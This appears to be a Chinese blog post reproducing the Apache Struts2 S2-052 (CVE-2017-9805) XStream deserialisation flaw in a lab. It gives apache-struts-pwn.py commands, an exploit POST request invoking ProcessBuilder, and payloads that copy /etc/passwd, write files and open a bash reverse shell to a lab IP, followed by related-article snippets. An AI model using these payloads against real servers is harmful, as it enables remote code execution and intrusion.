http s2.me ios.html,S2-052 漏洞复现

最新推荐文章于 2023-09-12 10:36:32 发布
最新推荐文章于 2023-09-12 10:36:32 发布
阅读量113 收藏
点赞数
文章标签: http s2.me ios.html

Structs2框架已知的漏洞编号如下:

S2-005

S2-009

S2-016 (含S2-013)

S2-019

S2-020

S2-021

S2-032

S2-037(含S2-033)

DevMode

S2-045

S2-046

S2-048

S2-052

S2-055

S2-057

访问 http://你的 IP 地址:端口号/

d687ee8c502ce8336c2ec6afd2b5666c.png

漏洞poc检测与利用

poc下载:

检测到漏洞存在:

python apache-struts-pwn.py -u 'http://192.168.190.135:8080/orders/3/edit'

0855f11d9c08aafe8570ad16453ff315.png

漏洞利用写入文件

python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'

POST /orders/3 HTTP/1.1

Host: 192.168.190.135:8080

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/xml

Content-Length: 2415

Connection: close

Referer: http://192.168.190.135:8080/orders/3/edit

Cookie: JSESSIONID=8FCB55C3A30CB6059D3530A01C3E6FA0

Upgrade-Insecure-Requests: 1

DNT: 1

0

false

0

touch

/tmp/success

false

java.lang.ProcessBuilder

start

foo

foo

false

0

0

false

false

0

c53d0aa1c79f54d434e2cbeaa9617380.png

de2828e3f859da25015fcd24876f1e8f.png

43d2562349b262b515c91d999789d68a.png

以上数据包成功执行的话,会在docker容器内创建文件/tmp/success,

执行docker-compose exec struts2 ls /tmp/即可看到。

docker-compose exec struts2 ls /tmp/

55d8a21509f795743d8e6023100b1693.png

读文件:

cp/etc/passwd/tmp/passwd

写文件:

bash

-c

echo micr067 > /tmp/test.txt

14dca218120030cb89c612f4ae499e42.png

反弹shell:

bash-cbash -i >&; /dev/tcp/192.168.190.130/1521 0>&;1

128e6e7216156404adf214156b762ec2.png

参考链接:

weixin_39868959
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
qq_51577576的博客
12-15 1457
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805) Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,使用XStream组件对XML格式的数据包进行反序列化操作时,未对数据内容进行有效验证,存在安全隐患,可被远程攻击。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1079
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
HttpHttps、Http2、Http3 学习及对比
majing0520的博客
03-17 3131
记一次 HTTP 的知识扫盲 What 什么是 HTTPHTTP ( hypertext transfe protocol ) 超文本传输协议,是一个简单的 请求-响应 协议。     通过浏览器和服务的数据交互,进行超文本(文本、图片、视频等)传输数据的一种双向规定协议。 How      HTTP 通常运行在 TCP 之上,指定了客户端可能发送给服务器什么样的消息以及得到什么样的响应。 ...
HTTPHTTPS、HTTP2
翻身咸鱼的博客
12-06 4966
首先我们看一些基础 五层模型 从下往上 物理层 主要是定义物理设备如何传输数据 数据链路层 在通信的实体间建立数据链路连接 网络层 为数据在节点之间传输创建逻辑链路 IP 协议就是在这一层 传输层 向用户提高可靠的端到端(End-to-End)服务 传输层向高层屏蔽了下层数据通信的细节 tcp,udp就在这一层 应用层 为应用软件提供了很多服务 屏蔽网络传输相关细节 http,ftp协议在这一层 ...
「计算机网络」浅谈HTTPHTTPS、HTTP2(概述、区别与联系)
frozenpenguin的博客
03-29 2192
HTTP(HyperText Transfer Protocol),即超文本运输协议,是实现网络通信的一种规范在计算机和网络世界有,存在不同的协议,如广播协议、寻址协议、路由协议等等…而HTTP是一个传输协议,即将数据由A传到B或将B传输到A,并且 A 与 B 之间能够存放很多第三方,如: AXYZB传输的数据并不是计算机底层中的二进制包,而是完整的、有意义的数据,如HTML 文件, 图片文件, 查询结果等超文本,能够被上层应用识别在实际应用中,HTTP常被用于在Web。
浅析HTTP/2的一些新特性
Month的博客
06-12 2597
1.首部压缩 1.X版本中,首部用文本格式传输,通常会给每个传输增加500-800字节的开销。现在打开一个网页上百个请求已是常态,而每个请求带的一些首部字段都是相同的,例如cookie、user-agent等。HTTP2为此采用HPACK压缩格式来压缩首部。头部压缩需要在浏览器和服务器端之间: 维护一份相同的静态字典,包含常见的头部名称,以及常见的头部名称和值的组合 维护一份相同的动态字典,...
HTTPS②基本概念
狼行千里吃肉
12-10 679
证书 实际上,我们使用的证书分很多种类型,SSL证书只是其中的一种。证书的格式是由X.509标准定义。SSL证书负责传输公钥,是一种PKI(Public Key Infrastructure,公钥基础结构)证书。 我们常见的证书根据用途不同大致有以下几种: 1、SSL证书,用于加密HTTP协议,也就是HTTPS。 2、代码签名证书,用于签名二进制文件,比如Windows内核驱动,Firef
CVE-2017-9805-POC.py s2-052.py 批量检测脚本
12-08
Apache Struts2的REST插件存在远程代码执行的高危漏洞,其编号为CVE-2017-9805(S2-052)。Struts2 REST插件的XStream组件存在反序列化漏洞,...[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-052(CVE-2017-9805)
毕业设计企业网站源码-s2-052-reproducing:s2-052-再现
06-06
S2-052(CVE-2017-9805)远程代码执行漏洞 0x00 漏洞描述 Apache Struts是美国阿帕奇(Apache)软件基金会负责维护的一个开源项目,是一套用于创建企业级Java Web应用的开源MVC框架。 Struts2是一个基于MVC设计模式的...
C++连Https2
10-12
C++ 连接openssl,https,示例
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
撑杆 Apache Struts CVE-2017-5638的漏洞利用 用法 测试单个URL。 python struts-pwn.py --url 'http://example.com/struts2-showcase/index.action' -c 'id' 测试网址列表。 python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 python struts-pwn.py --check --list 'urls.txt' 要求 Python2或Python3 要求 法律免责声明 该项目仅用
Struts2 安全漏洞解决方法
09-15
Struts2 安全漏洞解析,距离上个版本发布仅仅过去1周,apache struts官网又发布struts2最新版本安全公告,主要修复了一个漏洞,代号S2-022:从漏洞简要描述来看,确定是对之前S2-021的补充。
安全超文本传输协议(HTTPS)详解
weixin_34179968的博客
03-30 898
一、概念与摘要 HTTPS (Secure Hypertext Transfer Protocol)安全超文本传输协议,是一个安全通信通道,它基于HTTP开发用于在客户计算机和服务器之间交换信息。它使用安全套接字层(SSL)进行信息交换,简单来说它是HTTP的安全版,是使用TLS/SSL加密的HTTP协议。 HTTP协议采用明文传输信息,存在信息窃听、信息篡改和信息劫持的风险,而协议TLS/SSL...
struts漏洞总结
Fiverya的博客
01-17 2824
struts2漏洞,从S2-001到 S2-061,嘿嘿。
http2 简介
weixin_34121304的博客
03-17 272
本文首发于 https://jaychen.cc 作者:jaychen 写一点东西关于 http2 的东西。 http2 的前身是由 google 领导开发的 SPDY,后来 google 把整个成果交给 IETF,IETF 把 SPDY 标准化之后变成 http2。google 也很大方的废弃掉 SPDY,转向支持 http2。http2 是完全兼容 http/1.x 的,在此基础上添加...
HTTPS/HTTP2
weixin_52180702的博客
09-12 431
最后,CA会将数字证书发送给申请者。客户端第一次请求服务器的时候,服务器通过响应头的形式,向客户端发送一个身份认证的Cookie,客户端会自动将Cookie保存在浏览器中。随后,当客户端浏览器每次请求服务器的时候,浏览器会自动将身份认证的相关的Cookie,通过请求头的形式发送给服务器,服务器即可验明客户端的身份。由于Cookie是存储在浏览器中的,而且浏览器也提供了读写cookie的API,因此cookie很容易被伪造,不具有安全性,因此不建议服务器将重要的隐私数据,通过cookie的形式发送给浏览器。
Https2
有趣的难受
01-15 781
package com.tojoy.wechatintegration.utils; import com.google.common.base.Stopwatch; import com.tojoy.wechatintegration.base.OgLog; import com.tojoy.wechatintegration.base.OptType; import lombok.Cleanu...
struts2漏洞S2-021
ymy131931的博客
05-08 1997
前段时间这个漏洞吵得比较火,最近研究了一下tomcat底层代码,结合struts2的框架源码跟踪了一下这个漏洞的触发过程。在整个debug过程中,感触颇多,遂留下此文以作三思笔记,不敢奢望太多,只希望对感兴趣的童鞋有所帮助,大牛飘过。如果文中哪里有不准确之处,还望各位积极拍砖指正。 0x00 老漏洞新玩法 关于利用,不得不先说一下S2-020这个漏洞,其实之前网上已经有相关文档讲述S...
s2-005漏洞复现
最新发布
10-05
s2-005漏洞是指在Struts2框架中存在的一个安全漏洞。该漏洞的原理是Struts2会将HTTP请求中的每个参数名解析为OGNL表达式进行执行。攻击者可以通过编码绕过安全限制,执行恶意的代码。 该漏洞的影响版本是Struts ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值